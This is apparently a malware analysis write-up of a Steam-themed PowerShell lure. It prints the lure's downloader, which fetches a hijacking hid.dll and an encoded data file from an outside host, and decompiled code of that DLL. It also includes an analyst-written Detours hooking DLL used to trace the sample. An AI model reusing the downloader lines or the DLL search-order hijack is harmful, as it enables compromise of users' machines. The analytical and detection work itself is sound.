https://mp.weixin.qq.com/s?__biz=MzkyOTc0NDY2Nw==&mid=2247484579&idx=1&sn=59e527ca060e26343855dce02d6e5eb5&chksm=c3d6e0a97888822bee70cf9e5d659f62af6c1a025f50a9cd531109781be8c8b9043e5eee8b7d&mpshare=1&scene=23&srcid=010402zGPQxpmjdjdJ674GoQ&sharer_shareinfo=fe4cb7a37b3be1f27a24552cef16b314&sharer_shareinfo_first=fe4cb7a37b3be1f27a24552cef16b314#rd

# irm = Invoke-RestMethod: fetches the script hosted at steam.work. Piping the
# response into echo only prints it, so this form is safe for inspection; the
# in-the-wild lure presumably pipes it into something that executes it -- TODO confirm.
irm steam.work | echo

删除之前的残留文件,然后从 http://1.steam.work/api/integral/pwsDownFile 下载两个文件:dll 放在 steam 目录下,命名为 hid.dll;vdf 文件放在 Local AppData 里的 steam 路径下,命名为 localData.vdf

# Downloader stage, excerpted from the script served by the URL above.
# $downApi, $d and $localPath are assigned earlier in that script and are not
# shown on this page. Both payloads come from the SAME endpoint; only the
# Referer header differs, so the Referer value is what selects the file
# server-side and is the field worth matching in proxy logs.
irm -Uri $downApi -Headers @{ Referer = "libary" } -OutFile $d -ErrorAction Stop
# First payload: fetched with Referer "libary" (sic) and renamed to .dll only
# afterwards -- the transfer itself never carries a .dll extension.
$newFilePath = [System.IO.Path]::ChangeExtension($d, ".dll")
Rename-Item -Path $d -NewName $newFilePath
 
Write-Host "[Result->1          OK]" -ForegroundColor:green
# Second payload: written as localData.vdf under the local AppData Steam path
# (see the page text above); this is the file the dropped DLL later reads and inverts.
$d = $localPath + "/localData.vdf"
irm -Uri $downApi -Headers @{ Referer = "localData.vdf" } -OutFile $d -ErrorAction Stop
Write-Host "[Result->2          OK]" -ForegroundColor:green
 
Start-Sleep 1
 
# Launches Steam, which is what gets the dropped hid.dll loaded -- the decompiled
# DllMain further down only acts when SteamUI.dll is present in the host process.
Start steam://
# Base64 merely hides the status text shown to the victim; the decoded string is
# printed on the next line. Decode offline rather than running the script.
$TextShow = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("W+i/nuaOpeacjeWZqOaIkOWKn+WcqFN0ZWFt5YWl5r+A5rS7IDPnp5LlkI7oh6pd"))
Write-Host "$TextShow" -ForegroundColor:green
Start-Sleep 3
# The three lines below appear to be the analyst's own fetch of the first
# payload for static analysis (hard-coded lab path), not part of the lure script -- TODO confirm.
$downApi = "http://1.steam.work/api/integral/pwsDownFile"
$dllPath = "E:\CTF\steam_dll\downloaded.dll"
Invoke-RestMethod -Uri $downApi -Headers @{ Referer = "libary" } -OutFile $dllPath

hid.dll,即 Human Interface Device (HID) Dynamic Link Library,是 Windows 操作系统中用于管理人机交互设备(如键盘、鼠标、游戏控制器等)的动态链接库文件。 它负责处理这些设备的输入和输出,确保设备与系统之间的通信顺畅

相当于 DLL 劫持

// Decompiler output (IDA-style pseudocode) of the entry point of the dropped hid.dll.
// The file sits in the Steam directory under the name of a system DLL, so the Steam
// process resolves hid.dll to this copy instead of the one in System32 (search-order
// hijacking). After running its own code it maps the genuine hid.dll so that the
// host's HID calls keep working. Detection angle: hid.dll being loaded from any path
// other than the Windows system directory.
BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  CHAR String1[260]; // [esp+0h] [ebp-108h] BYREF -- MAX_PATH buffer. Nothing in this
                     // listing zeroes it before the first lstrcatA; either sub_10001000
                     // initialises it or the decompiler dropped the init -- TODO confirm
 
  if ( fdwReason == 1 )                        // 1 == DLL_PROCESS_ATTACH
  {
    DisableThreadLibraryCalls(hinstDLL);
    if ( GetModuleHandleA("SteamUI.dll") )     // only proceeds when SteamUI.dll is already mapped, i.e. inside the Steam client
    {
      sub_10001000();                           // unresolved routine; the write-up treats this as the payload ("calls a function first, then opens the original hid")
      lstrcatA(String1, "C:\\Windows\\System32\\hid.dll");
      if ( GetFileAttributesA(String1) != -1 )  // -1 == INVALID_FILE_ATTRIBUTES: does the real hid.dll exist at the hard-coded path?
      {
LABEL_6:
        LoadLibraryExA(String1, 0, 8u);         // 8 == LOAD_WITH_ALTERED_SEARCH_PATH: map the genuine hid.dll by full path
        return 1;
      }
      if ( GetWindowsDirectoryA(String1, 0x104u) )  // 0x104 == MAX_PATH; fallback when Windows is not installed on C:
      {
        lstrcatA(String1, "\\System32\\hid.dll");
        goto LABEL_6;
      }
    }
  }
  return 1;
}

先调用一个函数(sub_10001000),再加载原来的 hid.dll

先读取之前放在 appdata 里的文件,再逐比特取反(用 SSE 向量指令加速)

// Decompiled bulk-inversion routine applied to the file fetched from AppData.
// v8 is the buffer, size its length in bytes, v10 the running byte offset
// (assumed to start at 0 -- the initialisation is outside this excerpt).
// Three tiers, the usual vectorised tail-handling shape: 64-byte blocks
// (four 16-byte SSE ops per iteration), then 8-byte pieces, then single bytes.
// _mm_andnot_ps(a, mask) computes (~a & mask); with xmmword_1001D520 presumably
// all-ones (the write-up calls this a bitwise NOT) each lane is simply inverted.
if ( size )
  {
    if ( size < 8 )
      goto LABEL_104;                         // too short even for one 8-byte step
    if ( size < 0x40 )
      goto LABEL_105;                         // too short for a 64-byte block
    v11 = (__m128 *)(v8 + 32);                // decompiler pointer arithmetic: v11[-2] is the current block base
    v12 = size & 0x3F;                        // bytes left over after whole 64-byte blocks
    do
    {
      v13 = v11[-2];
      v10 += 64;
      v11 += 4;
      // After v11 += 4, indices -6..-3 address offsets +0, +16, +32, +48 of the
      // block whose first 16 bytes were read into v13 -- one 64-byte block per iteration.
      v11[-6] = _mm_andnot_ps(v13, (__m128)xmmword_1001D520);
      v11[-5] = _mm_andnot_ps(v11[-5], (__m128)xmmword_1001D520);
      v11[-4] = _mm_andnot_ps(v11[-4], (__m128)xmmword_1001D520);
      v11[-3] = _mm_andnot_ps(v11[-3], (__m128)xmmword_1001D520);
    }
    while ( v10 < size - v12 );
    if ( v12 >= 8 )
    {
LABEL_105:
      do                                      // 8-byte steps up to size rounded down to a multiple of 8
      {
        *(_QWORD *)&v8[v10] = _mm_andnot_ps(
                                (__m128)_mm_loadl_epi64((const __m128i *)&v8[v10]),
                                (__m128)xmmword_1001D520).m128_u64[0];
        v10 += 8;
      }
      while ( v10 < (size & 0xFFFFFFF8) );
    }
    if ( v10 < size )
    {
LABEL_104:
      do                                      // final 0..7 bytes, one at a time
      {
        v8[v10] = ~v8[v10];                     // bitwise not
        ++v10;
      }
      while ( v10 < size );
    }
  }

https://cloud.tencent.com/developer/article/2337999

后续行为:导入 dll 并运行 LoadLibrary 函数

搜了一圈,发现该样本使用商用壳,静态脱壳不容易;还是通过后面的动态行为来分析


通过查看导入表来获取要 hook 的函数

可能会动态加载内核中的 Windows API,所以也要 hook 一些常用的函数

下方代码未经验证,仅供形式上参考(TODO)

#include <windows.h>
#include <detours.h>

#include <fstream>
#include <iostream>
#include <mutex>
#include <sstream>
#include <string>
 
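// Log sink shared by the hooks below and by DllMain. It is deliberately NOT
// opened here: the original opened it in this global constructor and then again
// in DllMain on DLL_PROCESS_ATTACH; calling open() on an already-open
// std::ofstream sets failbit and every later write is silently discarded.
// DllMain opens it once; the path is relative to the host process's current directory.
std::ofstream logFile;

// Hooks execute on whichever host thread called the original API, so writes to
// the shared stream are serialised through this lock.
std::mutex logMutex;

// Original function pointer types. The True* pointers are resolved by DllMain
// and rewritten by Detours to point at the trampolines into the original code.
typedef BOOL(WINAPI* VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);
typedef int(WINAPI* MessageBoxW_t)(HWND, LPCWSTR, LPCWSTR, UINT);
typedef BOOL(WINAPI* HttpAddRequestHeadersA_t)(HINTERNET, LPCSTR, DWORD, DWORD);
typedef NTSTATUS(WINAPI* BCryptDecrypt_t)(BCRYPT_KEY_HANDLE, PUCHAR, ULONG, VOID*, PUCHAR, ULONG, PUCHAR, ULONG, ULONG*, ULONG);

VirtualProtect_t TrueVirtualProtect = nullptr;
MessageBoxW_t TrueMessageBoxW = nullptr;
HttpAddRequestHeadersA_t TrueHttpAddRequestHeadersA = nullptr;
BCryptDecrypt_t TrueBCryptDecrypt = nullptr;

namespace {

// Writes one record (possibly several lines) under the lock and flushes at once,
// so the last entries survive if the host crashes or is killed mid-trace.
// Callers format the record BEFORE calling, so only the write itself happens
// while the lock is held. Runs on the hooked caller's thread: keep it cheap.
void LogRecord(const std::string& record) {
    std::lock_guard<std::mutex> guard(logMutex);
    logFile << record << '\n';
    logFile.flush();
}

// UTF-16 -> UTF-8 for the char-based log. Streaming an LPCWSTR straight into a
// std::ofstream prints the pointer value, not the text. MessageBoxW accepts a
// null text/caption, so null is rendered as "(null)" instead of being dereferenced.
std::string ToUtf8(LPCWSTR wide) {
    if (wide == nullptr) {
        return "(null)";
    }
    const int bytes = WideCharToMultiByte(CP_UTF8, 0, wide, -1, nullptr, 0, nullptr, nullptr);
    if (bytes <= 0) {
        return "(unconvertible)";
    }
    std::string out(static_cast<size_t>(bytes), '\0');  // count includes the terminating NUL
    WideCharToMultiByte(CP_UTF8, 0, wide, -1, &out[0], bytes, nullptr, nullptr);
    out.pop_back();                                       // drop the NUL the API wrote
    return out;
}

}  // namespace

// Hooked VirtualProtect. Page-protection changes are the tell-tale of an
// unpacker at work; requests that leave a region both writable and executable
// are tagged so they stand out when read next to the ProcMon trace.
BOOL WINAPI HookedVirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect) {
    std::ostringstream msg;
    msg << "[Hooked] VirtualProtect called!\n"
        << " - Address: " << lpAddress << '\n'
        << " - Size: " << dwSize << '\n'
        << " - New Protect: 0x" << std::hex << flNewProtect;
    if (flNewProtect & (PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)) {
        msg << "  <-- writable+executable";
    }
    LogRecord(msg.str());
    return TrueVirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect);
}

// Hooked MessageBoxW. Text and caption are converted to UTF-8; the original
// streamed the wide pointers and therefore logged addresses instead of strings.
int WINAPI HookedMessageBoxW(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType) {
    std::ostringstream msg;
    msg << "[Hooked] MessageBoxW called!\n"
        << " - Text: " << ToUtf8(lpText) << '\n'
        << " - Caption: " << ToUtf8(lpCaption);
    LogRecord(msg.str());
    return TrueMessageBoxW(hWnd, lpText, lpCaption, uType);
}

// Hooked HttpAddRequestHeadersA. The downloader stage shown earlier on this page
// selects the served file through the Referer header, so the complete header
// block is the interesting part. lpszHeaders may be null, and it is only
// NUL-terminated when dwHeadersLength is -1L; otherwise exactly dwHeadersLength
// bytes are readable and streaming it as a C string would over-read.
BOOL WINAPI HookedHttpAddRequestHeadersA(HINTERNET hRequest, LPCSTR lpszHeaders, DWORD dwHeadersLength, DWORD dwModifiers) {
    std::ostringstream msg;
    msg << "[Hooked] HttpAddRequestHeadersA called!\n"
        << " - Headers: ";
    if (lpszHeaders == nullptr) {
        msg << "(null)";
    } else if (dwHeadersLength == static_cast<DWORD>(-1L)) {
        msg << lpszHeaders;
    } else {
        msg.write(lpszHeaders, static_cast<std::streamsize>(dwHeadersLength));
    }
    msg << "\n - Modifiers: 0x" << std::hex << dwModifiers;
    LogRecord(msg.str());
    return TrueHttpAddRequestHeadersA(hRequest, lpszHeaders, dwHeadersLength, dwModifiers);
}

// Hooked BCryptDecrypt. Inputs are logged before the call (so a crash inside the
// real function still leaves a record); status and the produced size are logged
// after it, since *pcbResult is only meaningful on return. A call with
// pbOutput == nullptr is just a size query and produces no plaintext.
NTSTATUS WINAPI HookedBCryptDecrypt(BCRYPT_KEY_HANDLE hKey, PUCHAR pbInput, ULONG cbInput, VOID* pPaddingInfo, PUCHAR pbIV, ULONG cbIV, PUCHAR pbOutput, ULONG cbOutput, ULONG* pcbResult, ULONG dwFlags) {
    std::ostringstream before;
    before << "[Hooked] BCryptDecrypt called!\n"
           << " - Input Data Size: " << cbInput << '\n'
           << " - IV Size: " << cbIV << '\n'
           << " - Output buffer: " << static_cast<const void*>(pbOutput) << " (" << cbOutput << " bytes)\n"
           << " - Flags: 0x" << std::hex << dwFlags;
    LogRecord(before.str());

    const NTSTATUS status = TrueBCryptDecrypt(hKey, pbInput, cbInput, pPaddingInfo, pbIV, cbIV, pbOutput, cbOutput, pcbResult, dwFlags);

    std::ostringstream after;
    after << " - BCryptDecrypt status: 0x" << std::hex << static_cast<unsigned long>(status)
          << std::dec << ", result bytes: " << (pcbResult ? *pcbResult : 0UL);
    LogRecord(after.str());
    return status;
}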
 
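namespace {

// Installs `detour` over the function whose address is stored at *target, in its
// own Detours transaction, and reports the outcome. On success Detours rewrites
// *target to the trampoline that reaches the original code. The original code
// ignored every Detours return value, so a hook that failed to install was
// indistinguishable in the trace from one that worked.
bool AttachHook(PVOID* target, PVOID detour, const char* name) {
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    LONG rc = DetourAttach(target, detour);
    if (rc == NO_ERROR) {
        rc = DetourTransactionCommit();
    } else {
        DetourTransactionAbort();
    }
    if (rc == NO_ERROR) {
        logFile << "[Hook] attached " << name << std::endl;
    } else {
        logFile << "[Hook] FAILED to attach " << name << " (code " << rc << ")" << std::endl;
    }
    return rc == NO_ERROR;
}

// Removes a previously installed detour in its own transaction.
void DetachHook(PVOID* target, PVOID detour) {
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    DetourDetach(target, detour);
    DetourTransactionCommit();
}

// Resolves `proc` in `module` and installs `detour` on it. Only modules already
// mapped in the process are considered (GetModuleHandleA never loads anything),
// so if the host pulls in wininet.dll or bcrypt.dll after this DLL attached, the
// hook is skipped -- that gap is now written to the log instead of passing
// silently. `trueFn` stays null on any failure so DLL_PROCESS_DETACH does not
// try to detach a hook that was never installed.
template <class Fn>
void ResolveAndHook(Fn& trueFn, const char* module, const char* proc, PVOID detour) {
    trueFn = nullptr;
    HMODULE hMod = GetModuleHandleA(module);
    if (hMod == nullptr) {
        logFile << "[Hook] " << module << " not loaded at attach time; " << proc << " not hooked" << std::endl;
        return;
    }
    Fn resolved = reinterpret_cast<Fn>(GetProcAddress(hMod, proc));
    if (resolved == nullptr) {
        logFile << "[Hook] " << proc << " not exported by " << module << std::endl;
        return;
    }
    trueFn = resolved;
    if (!AttachHook(&reinterpret_cast<PVOID&>(trueFn), detour, proc)) {
        trueFn = nullptr;
    }
}

}  // namespace

// DLL entry point.
// DLL_PROCESS_ATTACH: open the log (once) and detour the four monitored APIs.
// DLL_PROCESS_DETACH: remove the detours and close the log.
// Both branches run under the loader lock, so the work is limited to
// GetModuleHandle/GetProcAddress and Detours calls -- no LoadLibrary here.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        // The global std::ofstream may already have opened this file; open() on
        // an open stream sets failbit and silently disables all later logging.
        if (!logFile.is_open()) {
            logFile.open("dll_hook_log.txt", std::ios::out);  // relative to the host's current directory
        }
        logFile << "DLL Hook initialized!" << std::endl;

        ResolveAndHook(TrueVirtualProtect, "kernel32.dll", "VirtualProtect", reinterpret_cast<PVOID>(HookedVirtualProtect));
        ResolveAndHook(TrueMessageBoxW, "user32.dll", "MessageBoxW", reinterpret_cast<PVOID>(HookedMessageBoxW));
        ResolveAndHook(TrueHttpAddRequestHeadersA, "wininet.dll", "HttpAddRequestHeadersA", reinterpret_cast<PVOID>(HookedHttpAddRequestHeadersA));
        ResolveAndHook(TrueBCryptDecrypt, "bcrypt.dll", "BCryptDecrypt", reinterpret_cast<PVOID>(HookedBCryptDecrypt));
    } else if (ul_reason_for_call == DLL_PROCESS_DETACH) {
        // NOTE(review): lpReserved is non-null when the whole process is
        // terminating rather than this DLL being unloaded; detaching is still
        // attempted, as before, but at that point the other threads are gone and
        // the cleanup is mostly cosmetic -- confirm against the Detours guidance.
        if (TrueVirtualProtect) {
            DetachHook(&reinterpret_cast<PVOID&>(TrueVirtualProtect), reinterpret_cast<PVOID>(HookedVirtualProtect));
        }
        if (TrueMessageBoxW) {
            DetachHook(&reinterpret_cast<PVOID&>(TrueMessageBoxW), reinterpret_cast<PVOID>(HookedMessageBoxW));
        }
        if (TrueHttpAddRequestHeadersA) {
            DetachHook(&reinterpret_cast<PVOID&>(TrueHttpAddRequestHeadersA), reinterpret_cast<PVOID>(HookedHttpAddRequestHeadersA));
        }
        if (TrueBCryptDecrypt) {
            DetachHook(&reinterpret_cast<PVOID&>(TrueBCryptDecrypt), reinterpret_cast<PVOID>(HookedBCryptDecrypt));
        }

        logFile << "DLL Hook detached!" << std::endl;
        logFile.close();
    }
    return TRUE;
}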
 

hook 之后,结合 ProcMon 的记录一起看行为